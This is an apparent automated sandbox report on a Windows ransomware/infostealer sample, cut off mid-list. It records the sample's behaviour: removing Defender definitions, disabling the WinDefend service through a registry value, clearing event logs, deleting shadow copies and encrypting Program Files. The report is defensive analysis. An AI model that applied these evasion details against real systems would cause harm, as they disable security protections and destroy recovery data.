Resubmissions
13-01-2022 14:14
220113-rj8ymsagb4 1013-01-2022 11:04
220113-m6crhahfgj 1013-01-2022 10:58
220113-m3a4hahef9 10Analysis
-
max time kernel
57s -
max time network
153s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
13-01-2022 10:58
Static task
static1
Behavioral task
behavioral1
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
Resource
win10-en-20211208
General
-
Target
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe
-
Size
2.5MB
-
MD5
8fdfa1997b566f6e086c29e33935dcc5
-
SHA1
178fbe1c8fc1a6e3440215d668797699f94a4bef
-
SHA256
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68
-
SHA512
b185d1080c62f59ff26592321bf2a5cb85556260f34f59726cc9d5aeed1f82a48c710e8decd1212ddc2e4ca371ba83ad3aca6bf34587ddc73cc9c90afec467d5
Malware Config
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 4344 MpCmdRun.exe -
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u6TustaWNW80.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_dRX2kSBd8-I0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]_jKkhBXu26cc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Gallery.thmx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aubd7EaVH7g0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogoSmall.contrast-white_scale-140.png.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_PDMFPp_N5sg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2Uy4j37glBE0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\linesdistinctive.dotx.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e-fdEeB6NZQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_SubTrial-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KLNKfZtaxgc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_O9UWejGBZsg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_p_D2pXOLaPg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-startup.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_CDZHotFKzhY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\tabskb.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\ipsita.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\feature.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TT3l7SEPVbQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ecf.ssl_1.1.0.v20140827-1444.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vq9hbZ6isos0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_OEM_Perp3-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_t_q-H0Fwyuk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_f74xiJwk6J40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial1-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sC6txoINkxM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdR_OEM_Perp-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_sG2wwPjKhcs0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Word2019R_Retail-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_vSOQw2a6NtU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_AlqxZ1hwEtk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-compat_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_e1wb2jxfFrM0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\security\blacklist.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_8_KuKZUQxuk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Retail-ul-phn.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_opG2TB2KxRY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\ja-JP\msdasqlr.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2QInFJrgL500.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019MSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LcCfXeWreww0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\LASER.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_KfR7gcjBHnI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL108.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_LhjMpSvU4Mc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PersonaSpy\notice.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_xPbG3pzwwC40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-MX\tipresx.dll.mui cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_OEM_Perp-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_zVSvPvogpvQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Internet Explorer\de-DE\iexplore.exe.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_R9OV6-n5LH00.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_fYaD4mX2Jt80.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-api-annotations-common_zh_CN.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_gzVcIpieRYk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_ooyu-bPKq7o0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProMSDNR_Retail-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_schHjeN7pfw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\sv\msipc.dll.mui.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_9EwQFLOz8Bc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MEDIA\CAMERA.WAV.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Ato2AUXaqpk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aRy6dd9lJmY0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\ja-jp.xml cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.nl_ja_4.4.0.v20140623020002.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Eu6Tbbj7xFg0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp3-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_jKvcEfP5Gj80.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusR_Grace-ul-oob.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_XbwawN3m78I0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Iw_NvNnGh-Y0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OutlookR_Trial-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_GCCHLIqOR800.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\ClientSub_eula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_HHe4TjruLfs0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Bibliography\Style\APASixthEditionOfficeOnline.xsl.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_eJXb6MKG-Ak0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification.ja_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_u-Lb0TLVjJU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\WacLangPackEula.txt.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_3ZTgQ4pCBtk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\leftnav.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_b7BKT4GfSTk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-dialogs_ja.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_5T5Os-4u0Y40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSGR8EN.LEX.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_aiL5EAiVNHQ0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark.css.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_Vy4WlpRw8mU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ANTQUAI.TTF.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_tR_G96RAVcU0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jce.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_h_P3hHh55lc0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_2AYuo4OFmgw0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_i34hTHRddwk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_DbbBGl8Mznk0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\win32_MoveNoDrop32x32.gif.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_qq2dQt6v90Q0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\management\snmp.acl.template.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_TbhbsurI0280.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProR_OEM_Perp-pl.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_46jjTW_3O680.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_kZVkxwKDDwI0.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStd2019R_Grace-ppd.xrm-ms.yGyeVgd6MNZkfJ2sx6DwhnkYPRs0btDsqXS5R8aGsf3_1XKlntuGei40.fmu9d cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 2192 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.execab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exepid process 3280 powershell.exe 3280 powershell.exe 3280 powershell.exe 2148 powershell.exe 2148 powershell.exe 2148 powershell.exe 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 4000 wevtutil.exe Token: SeBackupPrivilege 4000 wevtutil.exe Token: SeSecurityPrivilege 4040 wevtutil.exe Token: SeBackupPrivilege 4040 wevtutil.exe Token: SeSecurityPrivilege 4092 wevtutil.exe Token: SeBackupPrivilege 4092 wevtutil.exe Token: SeIncreaseQuotaPrivilege 3128 wmic.exe Token: SeSecurityPrivilege 3128 wmic.exe Token: SeTakeOwnershipPrivilege 3128 wmic.exe Token: SeLoadDriverPrivilege 3128 wmic.exe Token: SeSystemProfilePrivilege 3128 wmic.exe Token: SeSystemtimePrivilege 3128 wmic.exe Token: SeProfSingleProcessPrivilege 3128 wmic.exe Token: SeIncBasePriorityPrivilege 3128 wmic.exe Token: SeCreatePagefilePrivilege 3128 wmic.exe Token: SeBackupPrivilege 3128 wmic.exe Token: SeRestorePrivilege 3128 wmic.exe Token: SeShutdownPrivilege 3128 wmic.exe Token: SeDebugPrivilege 3128 wmic.exe Token: SeSystemEnvironmentPrivilege 3128 wmic.exe Token: SeRemoteShutdownPrivilege 3128 wmic.exe Token: SeUndockPrivilege 3128 wmic.exe Token: SeManageVolumePrivilege 3128 wmic.exe Token: 33 3128 wmic.exe Token: 34 3128 wmic.exe Token: 35 3128 wmic.exe Token: 36 3128 wmic.exe Token: SeIncreaseQuotaPrivilege 4316 wmic.exe Token: SeSecurityPrivilege 4316 wmic.exe Token: SeTakeOwnershipPrivilege 4316 wmic.exe Token: SeLoadDriverPrivilege 4316 wmic.exe Token: SeSystemProfilePrivilege 4316 wmic.exe Token: SeSystemtimePrivilege 4316 wmic.exe Token: SeProfSingleProcessPrivilege 4316 wmic.exe Token: SeIncBasePriorityPrivilege 4316 wmic.exe Token: SeCreatePagefilePrivilege 4316 wmic.exe Token: SeBackupPrivilege 4316 wmic.exe Token: SeRestorePrivilege 4316 wmic.exe Token: SeShutdownPrivilege 4316 wmic.exe Token: SeDebugPrivilege 4316 wmic.exe Token: SeSystemEnvironmentPrivilege 4316 wmic.exe Token: SeRemoteShutdownPrivilege 4316 wmic.exe Token: SeUndockPrivilege 4316 wmic.exe Token: SeManageVolumePrivilege 4316 wmic.exe Token: 33 4316 wmic.exe Token: 34 4316 wmic.exe Token: 35 4316 wmic.exe Token: 36 4316 wmic.exe Token: SeIncreaseQuotaPrivilege 4316 wmic.exe Token: SeSecurityPrivilege 4316 wmic.exe Token: SeTakeOwnershipPrivilege 4316 wmic.exe Token: SeLoadDriverPrivilege 4316 wmic.exe Token: SeSystemProfilePrivilege 4316 wmic.exe Token: SeSystemtimePrivilege 4316 wmic.exe Token: SeProfSingleProcessPrivilege 4316 wmic.exe Token: SeIncBasePriorityPrivilege 4316 wmic.exe Token: SeCreatePagefilePrivilege 4316 wmic.exe Token: SeBackupPrivilege 4316 wmic.exe Token: SeRestorePrivilege 4316 wmic.exe Token: SeShutdownPrivilege 4316 wmic.exe Token: SeDebugPrivilege 4316 wmic.exe Token: SeSystemEnvironmentPrivilege 4316 wmic.exe Token: SeRemoteShutdownPrivilege 4316 wmic.exe Token: SeUndockPrivilege 4316 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3384 wrote to memory of 2640 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 2640 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 2640 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 2640 wrote to memory of 4240 2640 net.exe net1.exe PID 2640 wrote to memory of 4240 2640 net.exe net1.exe PID 2640 wrote to memory of 4240 2640 net.exe net1.exe PID 3384 wrote to memory of 4076 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4076 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4076 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4076 wrote to memory of 2008 4076 net.exe net1.exe PID 4076 wrote to memory of 2008 4076 net.exe net1.exe PID 4076 wrote to memory of 2008 4076 net.exe net1.exe PID 3384 wrote to memory of 4256 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4256 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4256 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4256 wrote to memory of 4288 4256 net.exe net1.exe PID 4256 wrote to memory of 4288 4256 net.exe net1.exe PID 4256 wrote to memory of 4288 4256 net.exe net1.exe PID 3384 wrote to memory of 4272 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4272 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4272 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 4272 wrote to memory of 4404 4272 net.exe net1.exe PID 4272 wrote to memory of 4404 4272 net.exe net1.exe PID 4272 wrote to memory of 4404 4272 net.exe net1.exe PID 3384 wrote to memory of 4384 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 4384 3384 cab6cf122d0b7129f5083dd0f494bb2f0ecae8c02cf544111e1fc51e13a9fb68.exe net.exe PID 3384 wrote to memory of 